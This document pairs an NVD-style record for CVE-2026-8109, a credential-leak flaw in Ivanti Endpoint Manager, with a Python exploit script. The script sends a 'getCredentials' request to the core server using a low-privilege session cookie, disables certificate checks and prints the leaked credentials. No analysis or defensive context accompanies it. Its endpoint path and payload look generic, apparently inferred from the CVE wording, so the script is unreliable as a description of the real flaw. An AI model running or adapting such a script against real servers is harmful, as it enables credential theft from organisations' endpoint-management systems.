CVE-2026-8109

import requests # Target configuration target_url = "https://<TARGET_IP>:8080/core/API/ExposedDangerousMethod" auth_cookie = "user_session_id=low_privilege_session_token" # Headers with low privilege authentication headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Exploit/1.0", "Cookie": auth_cookie, "Content-Type": "application/json" } # Exploit payload payload = { "action": "getCredentials", "target": "core_db" } try: print(f"[+] Sending exploit request to {target_url}...") response = requests.post(target_url, json=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Exploit successful!") print("[+] Leaked Credentials:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-8109", "sourceIdentifier": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "published": "2026-05-12T15:16:17.420", "lastModified": "2026-05-12T19:18:29.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An exposed dangerous method on the Core Server of Ivanti Endpoint Manager before version 2024 SU6 allows a remote authenticated attacker to leak access credentials."}], "metrics": {"cvssMetricV31": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Primary", "description": [{"lang": "en", "value": "CWE-749"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*", "versionEndIncluding": "2022", "matchCriteriaId": "372561DA-DEAF-47DA-99B3-8BBBDADFD91A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*", "matchCriteriaId": "6C7283FE-C10A-4E37-B004-15FB0CAC49A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:*", "matchCriteriaId": "FC51EEA2-1C4C-4069-9704-7ACFE4773930"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:*", "matchCriteriaId": "E1EF5E1B-9377-49D3-9BE3-62FC78E666A3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:*", "matchCriteriaId": "749AADDA-834D-4EC0-B7FF-E136FD1984F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3_security_release_1:*:*:*:*:*:*", "matchCriteriaId": "698BF7A1-62A1-45B5-BF08-AB3F3AA0245C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su4:*:*:*:*:*:*", "matchCriteriaId": "4902A745-E7CB-4FC9-9BCB-89EFAB643237"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su4_security_release_1:*:*:*:*:*:*", "matchCriteriaId": "9DF8F788-0384-4E6B-844E-35ED79CA1F17"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su5:*:*:*:*:*:*", "matchCriteriaId": "BABFF9B3-92CE-4086-BE93-9A884F1210D5"}]}]}], "references": [{"url": "https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-EPM-May-2026?language=en_US", "source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "tags": ["Vendor Advisory"]}]}}